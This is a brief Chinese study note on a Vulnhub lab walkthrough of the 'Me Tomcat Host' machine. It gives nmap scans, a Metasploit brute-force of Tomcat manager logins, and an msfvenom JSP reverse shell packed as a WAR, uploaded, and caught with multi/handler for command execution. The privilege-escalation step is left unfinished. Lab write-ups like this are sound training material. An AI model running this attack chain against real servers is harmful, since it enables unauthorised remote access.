Vulnhub靶场-Me Tomcat Host 学习笔记

Nmap -sS -Pn 192.168.232.0/24

 Vulnhub靶场-Me Tomcat Host 学习笔记_第1张图片

 

 

nmap -v -A -sS -Pn -T4 -p 1-65535 192.168.232.132

 Vulnhub靶场-Me Tomcat Host 学习笔记_第2张图片

 

 

扫页面

 Vulnhub靶场-Me Tomcat Host 学习笔记_第3张图片

 

 

 

数据库部署成功后打开msf,利用这个模块:use auxiliary/scanner/http/tomcat_mgr_login

Show Options查看需要部署的选项

RHOSTS:目标机ip

THREAD:线程,设为5即可

BRUTEFORCE_SPEED:攻击速度

 Vulnhub靶场-Me Tomcat Host 学习笔记_第4张图片

 

 Vulnhub靶场-Me Tomcat Host 学习笔记_第5张图片

 

 Vulnhub靶场-Me Tomcat Host 学习笔记_第6张图片

 

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.232.130 LPORT=10086  > shell.jsp

 jar -cvf shell.war shell.jsp

 在Tomcat里面上传此Shell

 

 

 用MSF来监听

 console

 use exploit/multi/handler

 set payload java/jsp_shell_reverse_tcp

 set LHOST 192.168.232.130

 set LPORT 10086

 exploit

 完成远程命令执行 权限为tomcat

 Vulnhub靶场-Me Tomcat Host 学习笔记_第7张图片

 

   接下来为提权(做完继续更= - =  目前刚做到这)

 

你可能感兴趣的:(Vulnhub靶场-Me Tomcat Host 学习笔记)